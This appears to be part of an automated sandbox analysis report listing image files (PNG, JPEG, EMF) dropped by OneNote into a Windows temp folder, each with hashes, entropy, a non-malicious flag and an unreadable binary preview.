                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Temp\{C121157D-F4DF-4DB0-96D2-A400B48B1614}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Temp\{C141A6F4-ACBD-4073-BCDA-20B29531E5FE}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33032
                                                                                                  Entropy (8bit):2.941351060644542
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                  MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                  SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                  SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                  SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                  Malicious:false
                                                                                                  Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

                                                                                                  C:\Users\user\AppData\Local\Temp\{C156C2BA-EC12-4B08-930E-C17AC1A4F81E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Temp\{C32DE9D4-8F55-4DE6-8319-A0291246E97D}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Temp\{C33E33C8-56F5-429B-B06E-3D5F4B4A2455}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5465
                                                                                                  Entropy (8bit):7.79401348966645
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                  MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                  SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                  SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                  SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

                                                                                                  C:\Users\user\AppData\Local\Temp\{C4564BC3-37B7-47BD-844A-7179BD5B4C60}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Temp\{C5B63109-F099-460F-975B-A1E1EE78CA0D}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):136726
                                                                                                  Entropy (8bit):7.973487854173386
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                  MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                  SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                  SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                  SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

                                                                                                  C:\Users\user\AppData\Local\Temp\{C8A834DF-7478-4306-BDDF-38F6050ABF39}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):39010
                                                                                                  Entropy (8bit):7.362726513389497
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                  MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                  SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                  SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                  SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                  C:\Users\user\AppData\Local\Temp\{C92A1ACC-62AE-4076-BB88-FE9E0DD832AF}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Temp\{C932A57A-3379-471B-9114-363031DE9E73}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Temp\{C94C3EED-A942-485D-A630-9B6CF4A5FEF5}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Temp\{C952F0C2-B5DF-4E2F-A126-8D955EEE2735}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14177
                                                                                                  Entropy (8bit):5.705782002886174
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                  MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                  SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                  SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                  SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                  C:\Users\user\AppData\Local\Temp\{CA87DE62-3925-40ED-8CEE-9A5FF083834E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
